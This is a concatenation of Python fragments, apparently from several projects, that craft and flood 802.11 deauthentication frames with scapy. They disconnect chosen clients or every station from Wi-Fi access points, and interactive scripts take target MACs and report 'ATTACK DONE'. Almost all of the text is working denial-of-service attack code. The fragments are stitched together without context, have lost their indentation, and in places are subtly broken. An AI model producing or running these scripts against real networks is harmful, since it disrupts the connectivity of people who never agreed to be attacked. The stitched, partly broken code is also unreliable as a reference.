def _deauth_target(self, target, packet_count):
# This also works with subtype 10, "Disassociation-Frame", verified
# with MBP running 10.12.4
ap_to_client_pckt = scapy.RadioTap() / scapy.Dot11(
type=0,
subtype=12,
addr1=target,
addr2=self._ap_bssid,
addr3=self._ap_bssid) / scapy.Dot11Deauth(reason=1)
actually_sent = 0
for n in range(packet_count) or packet_count == -1:
if not self._thread_event.isSet():
break
if n % 64 == 0:
time.sleep(0.1)
scapy.sendp(ap_to_client_pckt)
actually_sent = n
print "Sent " + str(actually_sent + 1) + " packets to " + target
with self._thread_lock:
self._threads_finished += 1
def deauth(**kwargs):
if kwargs.get("broadcast"):
clients = ["ff:ff:ff:ff:ff:ff"]
else:
clients = kwargs.get("clients")
ap = kwargs.get("ap")
for i in range(kwargs.get("count")):
for client in clients:
deauth_pkt = sc.Dot11(addr1=client, addr2=ap,
addr3=ap) / sc.Dot11Deauth()
ap_deauth_pkt = sc.Dot11(addr1=ap, addr2=client,
addr3=ap) / sc.Dot11Deauth()
for j in range(kwargs.get("burst-size")):
sc.send(deauth_pkt)
if not kwargs.get("broadcast"):
sc.send(ap_deauth_pkt)
time.sleep(kwargs.get("sleep-time"))
def deuath(self, ap: AccessPoint):
"""
Sends deauth packets to a given access point.
"""
pkt = (scapy.RadioTap() / scapy.Dot11(
addr1="FF:FF:FF:FF:FF:FF", addr2=ap.bssid, addr3=ap.bssid) /
scapy.Dot11Deauth(reason=7))
while True:
scapy.sendp(pkt, iface=self._interface)
def deauth(self, ssid, mac, client="FF:FF:FF:FF:FF:FF"):
global ipiw_lock
ipiw_lock.acquire()
# AP -> Client
p1 = sc.RadioTap() / sc.Dot11(
type=0,
subtype=12, addr1=client, addr2=mac, addr3=mac) / sc.Dot11Deauth(
reason=5) # reason = "AP cannot handle this many stations"
# Client -> AP
p2 = sc.RadioTap() / sc.Dot11(
type=0,
subtype=12, addr1=mac, addr2=client, addr3=mac) / sc.Dot11Deauth(
reason=8) # reason = "Client is leaving"
# socket (for performance)
s = sc.conf.L2socket(iface=self.netifmon)
for i in range(100):
s.send(p1)
s.send(p2)
s.close()
ipiw_lock.release()
def scan(self):
target_mac = "28:cf:e9:1e:50:2d"
gateway_mac = "0a:00:27:00:00:0e"
# 802.11 frame
# addr1: destination MAC
# addr2: source MAC
# addr3: Access Point MAC
dot11 = scapy.Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
# stack them up
packet = scapy.RadioTap()/dot11/scapy.Dot11Deauth()
# send the packet
scapy.sendp(packet, inter=0.2, count=10000, iface="Wi-Fi", verbose=1)
def craft_deauth_packet(sender, receiver, bssid):
"""
Return a deauthentication packet crafted with given information
:param sender: The MAC address of the sender
:param receiver: The MAC address of the receiver
:param bssid: The MAC address of the AccessPoint
:type sender: str
:type receiver: str
:type bssid: str
:return: A deauthentication packet
:rtype: scapy.layers.dot11.RadioTap
"""
return (scapy.RadioTap() / scapy.Dot11(
type=0, subtype=12, addr1=receiver, addr2=sender, addr3=bssid) /
scapy.Dot11Deauth())
def disconnect_device(router_mac: str, target_mac: str, iface: str,
count: int):
"""
Force deauthenticate a device.
Args:
router_mac (str): Gateway MAC address.
target_mac (str): MAC address of target device.
iface (str): Ethernet Interface Name.
count (int): Number of packets to be sent.
"""
if count == 0:
count = None
dot11 = sc.Dot11(type=0,
subtype=12,
addr1=target_mac,
addr2=router_mac,
addr3=router_mac)
packet = sc.RadioTap() / dot11 / sc.Dot11Deauth(reason=7)
sc.sendp(packet, inter=0.1, count=count, iface=iface, verbose=0)
#Start program
print(f"{RED}" + start)
#Show intructions
print(
f"{YELLOW}\n[!] Before run this program set your wireless card to monitor mode \n"
)
#Get informations from router
target_mac = input(f"{CYAN}Target MAC [EX: 68-7D-6B-OE-b-41]={RESET} ")
gateway_mac = input(f"{CYAN}Gateway MAC [EX: a4-33-d7-3a-d0-37]={RESET} ")
interface = input(f"{CYAN}interface [EX: wlan0man]={RESET} ")
packets = int(input(f"{CYAN}Number os packets={RESET} "))
#Create packet
# 802.11 frame
# addr1: destination MAC
# addr2: source MAC
# addr3: Access Point MAC
dot11 = scapy.Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
# stack them up
packet = scapy.RadioTap() / dot11 / scapy.Dot11Deauth(reason=7)
# send the packets
p = 0
while p <= packets:
scapy.sendp(packet, inter=0.1, count=100, iface=interface, verbose=1)
print(f"{YELLOW}[!] Packets send " + str(p)) #show number of send packets
p += 1
print(f"{GREEN}\n[+] ATTACK DONE !!!{RESET}")
apNum = raw_input(
"Pleas choose Ap from list above to see all devices on the AP \033[1m--enter Ap number--\033[0m"
)
print("connect to: ", ap[int(apNum)])
#step 3: we scan all devices on the AP
scapy.sniff(iface="mon0", prn=sniffmgmt, timeout=20)
#step 4 :chose Client MAC Address to attack
macNum = raw_input(
"Pleas choose device from list above to start Wifi deauth-attack \033[1m--enter mac number from list--\033[0m"
)
print("connect to: ", clients[int(macNum)])
# Access Point MAC Address
ap = ap[int(apNum)]
# Client MAC Address
client = clients[int(macNum)]
# Deauthentication Packet For Client
# Use This Option Only If you Have Client MAC Address
pkt1 = scapy.RadioTap() / scapy.Dot11(addr1=ap, addr2=client,
addr3=client) / scapy.Dot11Deauth()
t_end = time.time() + 100
while time.time() < t_end:
scapy.sendp(pkt1, iface="mon0", inter=0.001)
raw_input(
" '\033[1m'Finsih sucssesfuly! ThankYou Press --Enter to exit '\033[0m'")